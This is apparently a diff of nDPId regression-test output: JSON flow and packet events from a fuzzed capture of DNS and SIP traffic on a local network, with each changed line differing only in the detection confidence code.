00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":643,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120471002706,"pkt":"ALlUADRWAODtAW69CABFAABIbD4Au4ARSxNYqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":3,"flow_last_seen":1120471006712,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471006712,"pkt":"ADBUADRWAODtAW69CABFAABIbEcAAIARSwrAqAECwKgBAQsHADUANKe0ggkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAApAAE="} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":644,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120471001714,"flow_last_seen":1120471006712,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471006712,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470399719,"flow_last_seen":1120470399719,"flow_idle_time":620000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470399719,"flow_last_seen":1120470399719,"flow_idle_time":620000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470814334,"flow_last_seen":1120470817390,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1120471018720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471018720,"pkt":"ADBUADRWAODtAW69CABFAABEbEkAAIARSwzAqAECwKgBAQsIADUAMBesDQsAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1120471018721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471018721,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwgAR8InDQuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAgQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":308,"global_ts_msec":1120471018870} 00741{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":342,"pkt_l4_len":0,"thread_ts_msec":1120471018723,"pkt":"AODtAW69ADBUADRWCABFAAFIAABACDcRiuXU8iEjwKgBAhPEE8QBNCHFU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1120471019307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471019307,"pkt":"ADBUADRWAODtAW69CABFAABIbEwAAIARSwXAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1120471020302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471020302,"pkt":"ADBUADRWAODtAW69CABFAABIbE4AAIARSwPAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAAcF9zaXAEX3VkcANzaXAJY3liZXJjaXT5AmRrAAAhAAE="} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": 
{"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1120471022305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471022305,"pkt":"ADBUADRWAODtAW69CABFAABIbFAAAIARSwHAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470832512,"flow_last_seen":1120470840523,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 